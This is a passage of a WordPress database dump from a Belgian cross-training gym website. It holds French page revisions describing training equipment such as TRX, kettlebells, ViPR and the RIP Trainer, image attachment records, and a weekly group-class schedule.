combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>RIP Trainer</h1>Le Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:03:08', '2013-06-16 11:03:08', '', 22, 'http://www.crosstrainingcenter.be/?p=67', 0, 'revision', '', 0),
(68, 1, '2013-06-16 11:10:26', '2013-06-16 11:10:26', '', 'trx1', '', 'inherit', 'open', 'open', '', 'trx1', '', '', '2013-06-16 11:10:26', '2013-06-16 11:10:26', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg', 0, 'attachment', 'image/jpeg', 0),
(69, 1, '2013-06-16 11:03:19', '2013-06-16 11:03:19', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:03:19', '2013-06-16 11:03:19', '', 22, 'http://www.crosstrainingcenter.be/?p=69', 0, 'revision', '', 0),
(70, 1, '2013-06-16 11:13:51', '2013-06-16 11:13:51', '', 'kb', '', 'inherit', 'open', 'open', '', 'kb', '', '', '2013-06-16 11:13:51', '2013-06-16 11:13:51', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg', 0, 'attachment', 'image/jpeg', 0),
(71, 1, '2013-06-16 11:10:48', '2013-06-16 11:10:48', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:10:48', '2013-06-16 11:10:48', '', 22, 'http://www.crosstrainingcenter.be/?p=71', 0, 'revision', '', 0),
(72, 1, '2013-06-16 11:19:12', '2013-06-16 11:19:12', '', 'vipr-f1', '', 'inherit', 'open', 'open', '', 'vipr-f1', '', '', '2013-06-16 11:19:12', '2013-06-16 11:19:12', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg', 0, 'attachment', 'image/jpeg', 0),
(73, 1, '2013-06-16 11:14:12', '2013-06-16 11:14:12', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:14:12', '2013-06-16 11:14:12', '', 22, 'http://www.crosstrainingcenter.be/?p=73', 0, 'revision', '', 0),
(74, 1, '2013-06-16 11:19:30', '2013-06-16 11:19:30', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:19:30', '2013-06-16 11:19:30', '', 22, 'http://www.crosstrainingcenter.be/?p=74', 0, 'revision', '', 0),
(75, 1, '2013-06-16 11:22:29', '2013-06-16 11:22:29', '', 'ript', '', 'inherit', 'open', 'open', '', 'ript', '', '', '2013-06-16 11:22:29', '2013-06-16 11:22:29', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg', 0, 'attachment', 'image/jpeg', 0),
(76, 1, '2013-06-16 11:22:21', '2013-06-16 11:22:21', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:22:21', '2013-06-16 11:22:21', '', 22, 'http://www.crosstrainingcenter.be/?p=76', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(284, 1, '2013-07-04 16:29:04', '2013-07-04 16:29:04', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre 